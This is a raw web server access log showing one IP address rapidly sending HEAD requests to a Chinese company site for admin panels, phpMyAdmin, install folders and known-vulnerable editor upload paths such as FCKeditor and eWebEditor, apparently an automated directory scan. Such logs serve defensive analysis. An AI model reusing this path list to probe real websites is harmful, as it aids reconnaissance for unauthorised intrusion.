47.109.54.65 - - [08/Sep/2025:11:07:11 +0800] "HEAD /southidceditor HTTP/1.1" 499 0 "http://www.cqqizhou.com/southidceditor" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:11 +0800] "HEAD /edit HTTP/1.1" 499 0 "http://www.cqqizhou.com/edit" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:11 +0800] "HEAD /manager HTTP/1.1" 499 0 "http://www.cqqizhou.com/manager" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:11 +0800] "HEAD /sadmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/sadmin" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:11 +0800] "HEAD /tmp HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:11 +0800] "HEAD /PayOnline HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:14 +0800] "HEAD /setup HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /upload/admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /company HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /aspnet_client/FreeTextBox HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /edit/db HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /fund HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /fckeditor/dialog HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /s_admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /syssite/shopadmin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /FCKeditor/editor/dialog HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:15 +0800] "HEAD /syssite/install HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /WEB-INF HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /webadmin/htmledit HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /dmtbdata HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /Webedit/admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /admin888 HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /admin/editor/admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /intraAdmin/phpmyadmin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /eWebEditorNet/UploadFile HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /admin/editor/db HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /aspnet_client/system_web/2_0_50727 HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /edit/Include HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /aspnet_client/system_web HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /admin/wo%255Fedit/editor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /Edit/editor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:16 +0800] "HEAD /mdb HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:17 +0800] "HEAD /fckEditor/editor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [08/Sep/2025:11:07:17 +0800] "HEAD /shsjms HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
